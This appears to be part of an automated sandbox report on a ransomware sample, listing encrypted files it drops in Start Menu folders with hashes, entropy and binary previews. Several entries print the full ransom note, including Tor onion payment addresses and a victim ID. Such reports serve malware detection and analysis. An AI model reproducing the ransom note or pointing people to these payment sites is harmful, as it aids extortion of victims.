                                                                                                                                                      Preview: ....^.-,...[....1%..&s.X\.....v..., 4S.4.t.S.^.....#,.8.LZ.R..Y.O......|_..Q..v.s=QP...)....8I.;(.45JO'I+.no>._y....6.o......9S.@....{...-fE...IJ.].Y.....Y....c7.QRJ...b..)k..E....o.J...w].y...v.|....<r......!"...h..})...P.!........B.?..RC.<.c..JJ#...j..]..+.......(.t...Uu.=.j..QN..OL...B..~.{...a..Q...z...8x'q5M.t...4fk.@.a.h.](o...H9.'.....HB.].)..l...F2...^9y.=r7.!b.<....a...?+.-"..q...L..V)w,.XOO..|...N.k8..V...*[.w...|....(.!./(...1...d.8.?P.^5M.v.v.3.....W`mW...O.....{l.NP.n.z..Qw00Sb.........>.|.h0JK'..l3.kfe...Pb.......y...<...........r.iy!.}.=.........\6Ki.....B....'.f.......oM/..7N.?H......m...Jn".T.NW.E..0........2..O.]._.C.;.g.......^{D......w.....4.NfF.|a.`...oc.`S<..@a.2..hM..N44.=X..,...>.`.zY.......<....t..<....d$.......y.#.T..R/.VL.+,......a.7/...N.[G..X............}.]0..Wq....`..x..u...ji...N.y.....b...~....H-X.{n.".z.c}}.=....E....._,....tP,.N^..B.z67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.232825898097978
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:dCOOrC+XVxch8EQ+OzVtY8I0qIvL6zK8sevWAVgKTaCB7RZ0cHYIgtyUzd3J:QOOmeHEQ+OK6L6zCwgck3863J
                                                                                                                                                      MD5:4C53229CF3106D77C04F332F350A54DB
                                                                                                                                                      SHA1:29ADFD2659187DF41FDC9FA254248F4F9355E2F0
                                                                                                                                                      SHA-256:76038F932929960805AFFB6B47E660C9EE58BCC0263D6F51D651BFFF8CD957BC
                                                                                                                                                      SHA-512:0B20707BB555077E633CA6B66D6FB2BE7EDE6E3545DCF477294774E7C44D869CE7347BF9FBE715F355BB633A27A8A8D239992E6229AE9FE91EED9DD8CD292C5A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .M{..N5e..fr?.....#%.~..[.(.....2B.zm....+..u.gk...-.w.)......1...5........eU1bc.h..b.t..=Zv#NN...>...3...E..6...}d..S.?U.?...9.J"...m............._6....J.O.....k>U..(Ly......2....}..Ai1w.f.....t.T.U.........KsE...aS...V.y..u.d.m~.r5.S.d.{Dj.a.7.=.....R2..M..6.9...e.../B?.Q.Z0.%u$.W...M.`.U.zR.2m.].P;1PX.."I.>.kq.P.>-z..E..@..~...6....K...p.f.p..`&.U.d..n.<P.z..UKO._U.vQ..[...Q....I#..Ky..QC..g_M.f....D./.C...*.w..R..I..c..>(.N......l.............q#....^IkN...eh1.~.\[..%......u.........l.y..oM.gv2=Ea..!767 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.252683152439437
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:IJwPANSpQqEzyJ+XCu1dWU5ISHzK8sevWAVgKTaCB7RZ0cHYIgtyUzW:IyPovJSSCw5ISHzCwgck38/
                                                                                                                                                      MD5:E94195F357F97BD8FF6FF070E46D12F1
                                                                                                                                                      SHA1:67A551F22F5CE013F3646DF28893E442CCD57FD9
                                                                                                                                                      SHA-256:3C843A09096730E80B9CD4D53F4C0BD215D0FD7E52DC9BB4A7FA7253C18DFB6E
                                                                                                                                                      SHA-512:878B2B4544A2D5B4DF1ED6C039040483A113E460AD9D50ED2ED81772DC09F0688689EAEDA45E705F593C21F8C3830264B3EA66891B72E4036F08FC5F644F3C86
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: l...G....=q.K|?,.\-...'c...o.n.zKPX...<.o...L"@%S.~..]...uJ...O..l...CU......J...&.|.e..6r...d.T.......x.e0...Qz..u..../k.....-.....ul...(.......1$Z....T|....NI.\{..`.A..8......8.f..=...%...)Y!...h..J.w2..wn8;.4.'u.[..FZ=\..3.d.Z...>.?.!..L5...Y..8..j...CC..eY...0v...b=S.....#.[...@....%E.1=6%a.y....C..<...x.e...5.v4..2<w.!<.....Xk;V..me..A.n.!.3.....qB.>K_._.i..sO3.{..n........d..f.)0+.f......d4..k.W....6'..P..v.Y&HYjvu+=4heTGK+..dg=...0N.~...w^..._.M....!D7j.Oq`!.3......i_hy....>\.<.bm...[.et.......o........`.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1280
                                                                                                                                                      Entropy (8bit):6.045069934504888
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:frkky01cF6j/XBQl5V6TzxzK8sevWAVgKTaCB7RZ0cHYIgtyUz78:fIkRw6XB00TdzCwgck38N
                                                                                                                                                      MD5:ED58C871B780E0525E6F077BDF8400C1
                                                                                                                                                      SHA1:273D9FA9E65F87FBAB19ED5239C74D8E2151F1E5
                                                                                                                                                      SHA-256:B8265336965D59FD84BBA968E7ECD9296DEEE08272D5449EFF2E8205689E1083
                                                                                                                                                      SHA-512:61303959D5152E6D2789E6C02F4DBD6C0B9A274F4FB7A86B2EEA3235CC11B622891BEC6F8264A974BFEB66E01FEE5881FC6199319FA2D15E0A85E0DB8FFC69D4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...!..p.....0L......(.....3.......L.onl0..v..-...iV........A.).#,..{...$.?.E.....OiuB:.&.R.oH..TPD.D.SL.D.."..I......gh...#q..2D...nq........d..-M..g.<.<.D.E.....4Af..Y`.e..S."Mil..t]......v.K...eh..E$..v5..]........hL..F.@.|.-..9..m....i~/q}$s.....j.:.>=TSb,..@....qW.w.:....'..+.v.?..d.|.:8+.fv...... 1l....8..\.M{..1...[q.uA.V.. VlV.M.4.:....t..[..I...&.X9y.w.G+../K..A.ac:M..O....(0.....8$..'>.....:....j..vA.U..!F...0;].g...z.8......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3440
                                                                                                                                                      Entropy (8bit):7.554903022377892
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:yPgqVoCZZFdjzLhHuEf6zaAtF3Q5m1LB+brzTEN:yPgqV1dtzUPtF3QayM
                                                                                                                                                      MD5:B092E340CF730DC751EC1395321B7A95
                                                                                                                                                      SHA1:8A2E3180B16E7221678629443A95386AF905D586
                                                                                                                                                      SHA-256:2CA5BCD1CA9FADA58E85F3882374BF3B7BDCC5E92EA2E408B545A19E58BFBD7C
                                                                                                                                                      SHA-512:210DF880810054EBD940775EECD20EDB7A4CAD2E657ED1318D31426195B05614F5D812DBB6D28BD10301373AAEB009E6A22397011E69A7463153608596D332DD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..9A.....a...o....W6....6.m....o.g.g(.l...z^.;)......)PSK..0!..9O?`.1..!...S'..}.c...F?sL.....{....D.......q:da............$...m..0`\F....H.0.5....X..C.yR.tf........n.........M...P7..3....qy....3. WO..~...H.N.....m......1...)..Z.J.O3m.*......M.Fw;P.?....l..Z.^......g.9..NQs.GN..D......!.....W).hDaU...<.|H+.7d.'#.7.ub.q.TD..9w.;.yecw.....F8..E Q@.:..i-k?.....0c..y.>/.M~......-.......D!...S.9.v}2..9...4(:.Q...Z.......S.i....~8....N].,....q..i..g*....V.X.e.."....6.]{.. v.PFJ&..\...i...p.J..Z.....u..*twM......!....._..[i..$.tC..i.s......4.o...".s......\....xC. G.Ug.bW.#Yg>.@.`.......@.w..s.......A\........z.=.?l.@]......2|MX...Q.o.$........2FT.%..WN.4..Y..B]w.......|......=.,.X.;Tc;p...O..../|...6.(_K.6/..Ff..7..\..1FC........L~k-......0.D=$..N?zQ.1..\..ZL7....N..;..6.Y_.`e-.....W#.bgxV....Y.o...)o......Y$...(......'"......]......{...6.f..n.....B..Q.....I.#...t.3.8c_Y.,L4.....+....n.5.7vg..4_d.~.]..p..,E..j7:CI..].f+g;P.6.2...c.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2224
                                                                                                                                                      Entropy (8bit):7.1791670239771115
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:vmO1maXO3onmvwrMRiVZXXuB91ubzCwgck38crfv:nXWWmvwokjX6abzTEtfv
                                                                                                                                                      MD5:7CA4E93257DEE96E2A902E1D4DE5AD88
                                                                                                                                                      SHA1:0D7AD2E87DFB4A3031E3D64F9DEEC1F30D41FFC6
                                                                                                                                                      SHA-256:9F3DD608AC7CB45214E772B778168F3C5E582BC22E18D79790318DBBB7D70540
                                                                                                                                                      SHA-512:6FC0439C09E5C3C87E773CCDFA16A8D144C9A9931364F09FD9A202FABA2E305BDF54B7F6842FBCFD8BBF0C0880EA4F655EDD60AFA4D63934B89FB633AB2C6289
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..`....O.Tm..."b:......|..K..6...t........2.cY...-u...L...mG....X..............a.(.....h./.....(.s...E..:..8...K..]a;.1.,V.\.'r..a......D...%p.t vQi.;........M.l....N....+Y.._....c...S`...S..|..).....r..<.d.Rs7`...t&...".U.S..K9@.Iv+EpZ0Ko...U.~...U;.1&...i~?y..]-..I.(.t.Y..a.`..TJ.3...c."[l..FK.O.....;,...j.v+h4=.x~ ./...n.>.co....\>^w..;rw..7.O...~.^3.....x.....1..A-...F...".<b.wt....k..{...q.d..l'...?.?.P._#.H.q......*........K.|..C.}.}.>..g.\.GD|d.{(..].o..07...'Yv13..u..x..-.wB....yI.]..U.Y........o.U......a......."..d..).......|6..!...b_A.1.b..._..N#.........J.Q..?i.wI.C.eG..Q.|.J/]..Y.o(..H:....,.....tK.....I..&v....D.K.9Pb>#[d.r...&.....x.5.).09^|.....S*tA.I.>..:SW&..}kF.,.7....^......>.@...G..OT:R....f.(...]..7h.Jh.*O...zc..#.........3...t/R.]A..[e:.]#.u........=...T&...F..f....W.....X+ =...X.}rf...x.,...q......R....o[5H....g2!'C....m+.S......6.j.T....H.=.!..j..j........\...5.....P..R.... .%8P..C...m.L..a.....X...B:..\Y.y
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2224
                                                                                                                                                      Entropy (8bit):7.1608882751201195
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Hi6gk5lYaRDNtA9ktyaGLBk/DzYeKfrydKK3/zCwgck38EJT:C6gNaRMQpGLBIzYe6c/zTEtT
                                                                                                                                                      MD5:038017DF758B0796E4AEB5CC0E0C418C
                                                                                                                                                      SHA1:F8BB3269BEF4CE90A1BB3F505727E999D0EE567E
                                                                                                                                                      SHA-256:62F8F14B9C07B93A87826C4DA9322C3A16F87B14506B0EDEF63750B763622086
                                                                                                                                                      SHA-512:14F47EFB28F37E8959F8D35F3484DC5453C679E106A53C635D1305B6A09D7AD5C77C717EE9A32B5293F234FFC1FC50153C754E672959C555291BCA61D68166A5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...Q...?..pA.A...pL.......:.+F./i..J.H..P..K..."..p.N.|.rz.jU)..`.WqX......[..K.H..0?c.Z..\.i.1.Z.b..V..=...P@..d....i.J/..g.r.NA}l NO..w.X.........5W....V...._QP..**......qB.~$..h....i...@.&............6..Jz.E.p.....=.#.|...7.9.wZ.(......Y(K.,....;....pV7..SZ.."d.6\.]"...........d..g.._.0.......-..j0...C.J.....0^K,R.3.k.f..W....M...e3.........6.L..0.jgS07K.Q.z.h...2..|.]....0.4[......$IA....4[m.|H^../.a/.!X.,x..TZ...:^......9:4K...k.F5..n..h....i...I.U...hu$90..X.}...M..%.8..S.}6..u5.H35..O.=.............%.3!.....o.za..z....l^.6K.k......C..d.........uD.HH..t[.)....P^Yb1\\.p..T.I...~U..7A.8....p{..E|..ZJ...JU..X.....Q#..*.p...W..9D].c..o&:....^8c....o.&.Q.8.'..7........L...(_.R..!.&.2.&}.M&g..,5.Y-w.w3.*..*K<R;`.S..n.D.......b.d...T.q. .9M.~..qUO.8..#..........m\3~.b.JF.op...........W....h...&$.!.".9C...2.8.y.E.....+......m....V.N..._...c.....7....T.~R..x....}e'0=C....b.Nny......|....;r........;..d...B..?#../70.y.%7....c....,j8....
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3440
                                                                                                                                                      Entropy (8bit):7.568767225918289
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:hEQVkD8AIBUx26q6UP2LUOhcWvgM/DgzTEr:hX28pUxhqb2LUOhHgEDcO
                                                                                                                                                      MD5:E85AB84D8E8AC9E8CBD654C23BEBDF88
                                                                                                                                                      SHA1:EE27333F699B852C2B1698B1C6207C0F40C61FB5
                                                                                                                                                      SHA-256:96FA5C3D55AE1E9AC01EFB80078C3F84D45AAE7CC065326FC4C3BE226AA4136F
                                                                                                                                                      SHA-512:5BFAAC5C9CC1D980FF33FBC02350975CD4912313A816D3CEA5A9E0FBC44688C185AA3C6E19B8859D33A1348A51BBA6B2744608B92C027655F041DA2FF8FC8D1E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .!G......D.T....K..gWG0..~....Eb.H....".%t..X.$.g7CX.......a.,.E"........vPrF.;..~.r...)...m..3L %Vr....3qP..=s.1...i..q..j.O..Wr.....Jp.x....Ki...?.u[.^...~..L.LJ.R.Q.]h...0.8R..h.M....MGWl..0....+........t..R.....j......u.%...A..g.F...G"..=z.Z..W.....(....~...9..^9..?...!..:....H.a..5W...B..Q..`..^.+......i...l......g.D........x...N....D.tf.Df.._.K4J.>.|....P6.?....l....K.tr.[..n}..E.yE~........8....LQ.....F".C.B.%. .a#r..a..}.$.,..Zn[.A...V*...%...U.+>M.@.ET.. .5..#..0.v.s...O-...7..wUv..6.....DE.J.....@.....m9.L..s..z<.{....{...%.2...U.3`o."..=K....g>sS..~Vk.iA..d.];c5.....h.a...S.0.'....K..f.V.kv.l.. ..F..>.Xi..~..LZ&(}IW.......X.z.u.&M...*n.........ZG.AA....U.`.Z.&urXAx.kd..<..I!...c...Z.....b+.P.|$(I.k....3.;..a.9.=.oM.._p...z..S..Q...q..H..9.E.@ol....'...$...".B./)...7d.GT.C.8...L...Y.m...[.&rMn!M...QDx.R..S..@..k.....AJ.V...s....T8...\.....L.....5.........>)?..L....F.....A.....s(zu..<.:.03.=f..X.....6.A.J.H..U=...Gt....^.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1168
                                                                                                                                                      Entropy (8bit):5.778910268506134
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ndBRWH82w7lSH2zK8sevWAVgKTaCB7RZ0cHYIgtyUzakH:nz0cbBSWzCwgck38zkH
                                                                                                                                                      MD5:0260CFD663074E0037C81361B7D1EE23
                                                                                                                                                      SHA1:FE9AEC2A5204F5C464840755B2937C2B226CB2D5
                                                                                                                                                      SHA-256:ECDADC97D701E619AD737646EA7DFAB26084273851822B51A31C8E2DB3629B35
                                                                                                                                                      SHA-512:0CE0DED9A53BFEF39388A4BC4A9F8DC7DF847E34C139F84923E0A50299CFACA73BE0D42430034A04A8037D5F261B301E1F820106C7DDFF20AA0FF55E8DE5F89C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..t\.>..P,DI..5`fGr9%;.5I......V...t@p..z..Vm..c.....C....Wkc_.c<Ns_.x*.....f.M..9E....,.....q...?..2...:k.......mF....\.26z.#.8..X.}.....N...+.r......~.x....-.U....pSmR..K..".i.(.}.mO...#...Ia.......N.$>..*.\T.3w.V.*.%.}...#..;;.D...8.. .w.....C.M.U.,:..........f.*.=...C...M.o...)\.f......v...m.!i.......{.....=J....:.5G....z..>.....j67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1216
                                                                                                                                                      Entropy (8bit):5.937381373635444
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:IRygR3n8HxXZteeF0zK8sevWAVgKTaCB7RZ0cHYIgtyUzJd:sy4KdR0zCwgck38O
                                                                                                                                                      MD5:A481AD968457CD4911643E4640FDA383
                                                                                                                                                      SHA1:83E9B9405A23A17A6909328FF7211DAC18CF8789
                                                                                                                                                      SHA-256:A7042F96ABDAFC2BCDA6CB2EE816B671E6EA88E58955BC86D7B1E230CC0F122B
                                                                                                                                                      SHA-512:87C5285A7D8940E20ACE976A0154C21DC4798049FFE4806B8C5752BF2E2F023E3828EB9747632146FE0E5AC92B5246DAFC38ECC8587D38B153E35CE0242E41DA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: %..R...[Qg...#...Jg.}l...`..c.*...u..<s.An.C...+...]....8.$.Ae.m.n.Z=>`...T.<...G.=`.........K.k^.^...{..(?Xe.8P~...@}J...@..X&Xm...'..H../=....^.j.b...+.7......g.h.|.G.Q@.?..s.B..zQ...*..xX..E;..*:b..v.....P<..3.Zk^6.`..D-..IW...l...*a}..Um.tR.2..$...(.$.V,..c.b.y..t3?us...5.2.Yv<*.uI.h.X..)..m.,......K....~.}.i.Y(......8..(i.....M..n..[.> .-Ra.~..;vr)T`...7%..... .q....+.@._.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
